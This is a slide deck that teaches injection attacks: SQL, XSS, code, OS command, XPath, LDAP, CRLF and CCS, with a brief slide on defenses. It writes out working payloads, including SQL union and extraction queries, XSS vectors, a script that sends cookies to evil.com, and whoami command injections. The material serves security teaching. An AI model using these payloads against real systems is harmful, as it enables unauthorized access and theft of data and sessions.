1 of 18

Injection attacks

Srinivasu Amjuri

2 of 18

Injection Attack

3 of 18

OWASP top 10

4 of 18

Injection Types

  • SQL injection (SQLi) 
  • Cross-site Scripting (XSS) 
  • Code injection
  • OS Command Injection
  • XPath injection
  • LDAP Injection
  • CRLF Injection
  • CCS Injection

5 of 18

SQL Injection

SQL injection in different parts of the query

    • In SELECT statements, within the table or column name.

    • In SELECT statements, within the ORDER BY clause.

    • In UPDATE statements, within the updated values or the WHERE clause.

    • In INSERT statements, within the inserted values.

Normal Application Behavior

SQL Injection

6 of 18

Types of SQL Injections

  • Union-based
    • GET http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1, 2, 3 HTTP/1.1
  • Error-Based
    • https://example.com/index.php?Widget=123

  • Blind SQL injection
    • Boolean-based SQL Injection

xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm

    • time-based SQL Injection
      • '; IF (1=2) WAITFOR DELAY '0:0:10’–
      • '; IF (1=1) WAITFOR DELAY '0:0:10'--

7 of 18

XSS injection

  • Client-side code injection using Javascript, VBscript, ActiveX, Flash, CSS

<script>alert(document.domain)</script> <img src=1 onerror=alert(1)>

  • Cross-site Scripting Attack Vectors:
      • <script>, <body>, <img>, <iframe> <input>, <div>, <link>, <table>
      • JavaScript events

Exploits:

      • To steel cookies
      • To capture password

XSS Context:

  • XSS in HTML tag attributes

<tag attribute="asdfghjkl" name="example" value="1">

"><script>alert(document.domain)</script>

  • XSS into JavaScript
    • Terminating the existing script

</script><img src=1 onerror=alert(document.domain)>

    • HTML-encoding

<a href="#" onclick="... var input='&apos;-alert(document.domain)-&apos;'; ...">

    • JavaScript template literals

document.getElementById('message').innerText = `Welcome,${user.displayName}.`;

8 of 18

Types of XSS attacks

    • https://insecure-website.com/search?term=<script>/*+Bad+stuff+here...+*/</script>

Reflected XSS: where the malicious script comes from the current HTTP request.

<html>

<h1>Most recent comment</h1>

<script>doSomethingEvil();</script>

</html>

Stored XSS: where the malicious script comes from the website's database.

<script>

window.location="http://evil.com/?cookie="+document.cookie

</script>

DOM-based XSS: where the vulnerability exists in client-side code rather than server-side code.

9 of 18

Code Injection

This attack introduces a malicious code into the application, which is capable of compromising database integrity and/or compromising privacy properties, security and even data correctness.

  • Exploits:
    • steal data
    • bypass access and authentication control
    • full system compromise

http://example.com/?code=phpinfo();

http://example.com/?code=system('whoami’);

10 of 18

Command Injection

  • The payload injected by the attacker is executed as operating system commands. 
  • They are not language-specific 

http://example.com/ping.php?address=8.8.8.8%26dir

  • address=8.8.8.8%3Bwhoami (; character, Linux only)
  • address=8.8.8.8&26whoami (& character, Windows only)

11 of 18

XPath injection

<?xml version="1.0" encoding="utf-8"?>

<Employees>

<Employee ID="1">

<FirstName>Arnold</FirstName>

<LastName>Baker</LastName>

<UserName>ABaker</UserName>

<Password>SoSecret</Password>

<Type>Admin</Type>

</Employee>

<Employee ID="2">

<FirstName>Peter</FirstName>

<LastName>Pan</LastName>

<UserName>PPan</UserName>

<Password>NotTelling</Password>

<Type>User</Type>

</Employee>

</Employees>

Vulnerable Query options:

  • Single Quote (‘)
  • Double Quote (“)
  • Angular Parentheses ( <, >)
  • Comment Tag ( <!-- , --> )
  • Ampersand (&)
  • CDATA section delimiter (<![CDATA[/]]> )
  • HTML Code
  • Tag Injection

C#:

String FindUserXPath;

FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' And Password/text()='" + Request("Password") + "']";

Username: blah' or 1=1 or 'a'='a

Password: blah

FindUserXPath becomes //Employee[UserName/text()='blah' or 1=1 or

'a'='a' And Password/text()='blah']

Logically this is equivalent to:

//Employee[(UserName/text()='blah' or 1=1) or

('a'='a' And Password/text()='blah')]

12 of 18

LDAP Injection

Example:

LDAP for authentication (&(Username=user)(Password=pwd))

LDAP injection query:

(&(Username=user)(&))(Password=pwd)) ; 

  • (&) -> Absolute TRUE
  • (|) -> Absolute FALSE
  • OpenLDAP implementations the second filter will be ignored, only the first one being executed
  • In ADAM, a query with two filters isn´t allowed. Therefore, the injection is useless.

dn: cn=John Doe,dc=example,dc=comcn: John DoegivenName: Johnsn: DoetelephoneNumber: +1 888 555 6789mail: john@example.commanager: cn=Barbara Doe,dc=example,dc=comobjectClass: inetOrgPersonobjectClass: person

Query: (&(objectClass=person)(|(givenName=John)(mail=john*)))

Apps: OPEN LDAP, MS active Directory

13 of 18

CRLF Injection

  • used in HTTP headers to terminate a line.
  • they are used to split text streams, such as HTTP headers, into separate parts.
  • This attack is a server-side injection at the application layer. 
  • If a CRLF injection is successful, this can open the door for further exploits such as cross-site scripting (XSS)

Example:

123.123.123.123 - 08:15 -/index.php?page=home

/index.php?page=home&%0d%0a127.0.0.1 - 08:15 -/index.php?page=home&restrictedaction=edit

123.123.123.123 - 08:15 -/index.php?page=home&

127.0.0.1 - 08:15 -/index.php?page=home&restrictedaction=edit

14 of 18

CSS injection

  • CCS injection exploits a vulnerability found in the ChangeCipherSpec processing in some versions of OpenSSL.
  • invalid signals are sent by attackers in the handshake session between servers and clients. 
  • identity theft
  • Only exploitable of:
    • Server uses OpenSSL < 1.0.1h
    • Client uses OpenSSL <1.0.1h, <1.0.0m, <0.9.8za

15 of 18

Defenses against Injection attacks

    • Use of Prepared Statements (with Parameterized Queries)
    • Use of Stored Procedures
    • Whitelist Input Validation
    • Escaping All User Supplied Input

Primary Defenses:

    • Enforcing Least Privilege
    • Performing Whitelist Input Validation as a Secondary Defense

Additional Defenses:

16 of 18

SQL Injection Examples

17 of 18

  • Identifying the Back-end

MySQL["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],�["connection_id()=connection_id()" ,"MYSQL"],�["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],

MSSQL["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],�["@@CONNECTIONS>0" ,"MSSQL"],�["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],�["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],�["USER_ID(1)=USER_ID(1)" ,"MSSQL"],

Oracle["ROWNUM=ROWNUM" ,"ORACLE"],�["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],�["LNNVL(0=123)" ,"ORACLE"],

  • Detecting number of columns
  • Order/Group by
    • 1' ORDER BY 1--+    #True1' ORDER BY 2--+    #True1' ORDER BY 3--+    #True1' ORDER BY 4--+    #False 

  • UNION SELECT
  • 1' UNION SELECT null-- - Not working1' UNION SELECT null,null-- - Not working1' UNION SELECT null,null,null-- - Worked

18 of 18

Extract database names, tables and column names�

  • #Database names-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata#Tables of a database-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]#Column names-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]